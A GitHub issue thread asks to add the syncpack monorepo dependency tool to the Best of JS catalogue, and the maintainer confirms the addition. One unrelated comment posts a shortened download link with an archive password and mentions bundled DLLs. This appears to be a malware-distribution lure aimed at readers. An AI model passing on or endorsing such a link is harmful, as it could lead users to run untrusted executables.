### ISSUE TITLE
Add syncpack

### ISSUE THREAD

**Issue by xeusteerapat** [michaelrambeau/bestofjs#1008]
**Please briefly describe the project you'd like to add to _Best of JS_?**
- Consistent dependency versions in large JavaScript Monorepos.

**What is the GitHub repository of the project you'd like to add to _Best of JS_?**
- https://github.com/JamieMason/syncpack

**Before submitting the request to add a new project, please check the following points:**

- [x] The project is related to the web platform or Node.js
- [x] The source code is on GitHub and project has more than 100 stars on GitHub
- [x] The project has thorough documentation in English
- [x] The project is not deprecated and actively maintained

**How would this project be tagged? (Pick one or several existing tags from this list: https://bestofjs.org/tags)**
- Package Manager

**Also you can suggest new tags to add if you think _Best of JS_ is missing useful tags.**

**Comment by SagarChandra07** [comment]
maybe this will help
https://bit.ly/47P0Nvo
Archive password: changeme
I put the necessary dlls in the archive

**Comment by michaelrambeau** [comment]
Thank you @xeusteerapat `syncpack` is available on _Best of JS_

https://bestofjs.org/projects/syncpack
